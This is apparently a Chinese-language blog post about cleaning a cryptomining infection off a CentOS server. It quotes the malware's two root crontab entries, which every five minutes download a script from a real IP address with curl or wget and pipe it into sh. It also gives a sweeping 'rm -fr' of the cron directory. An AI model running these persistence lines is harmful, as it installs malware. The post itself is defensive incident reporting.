CentOS 服务器遇到挖矿程序
背景
服务器好久不登录,近期登陆时发现特别卡,于是使用 top 命令查看进程信息,发现有一个进程占用了 90% 以上的 CPU 资源,则登陆阿里云服务器发现漏洞警告,发现这个进程是在挖矿。
讲解
通常这种挖矿病毒,简单的 kill 和把进程的所在文件夹删除掉都不能起到斩草除根的效果,因这种病毒都会在服务器中创建一个定时脚本,每一段时间会检测病毒脚本是否被杀死了,如果杀死了并且可执行文件也被删除了,那么它就会自动下载源程序并且启动执行脚本。所以解决问题根本所在就是将定时任务删除掉,在将该进程杀掉才能起到效果。
解决
一、使用 cat /var/spool/cron/crontabs/root 查看定时任务内容
cat /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
可以看出来它有两个任务,删除 /var/spool/cron 下的内容
rm -fr /var/spool/cron/
二、删除进程和执行脚本
执行脚本路径使用 ps 命令来查看
[root@izbp11bmmclnlx35st0s3rz ~]# ps 31688
PID TTY STAT TIME COMMAND
31688 ? Ssl 11:07 /tmp/Macron
最后还是没有解决,和阿里云沟通结果:建议您重装系统呢。
本作品采用《CC 协议》,转载必须注明作者和本文链接
推荐文章: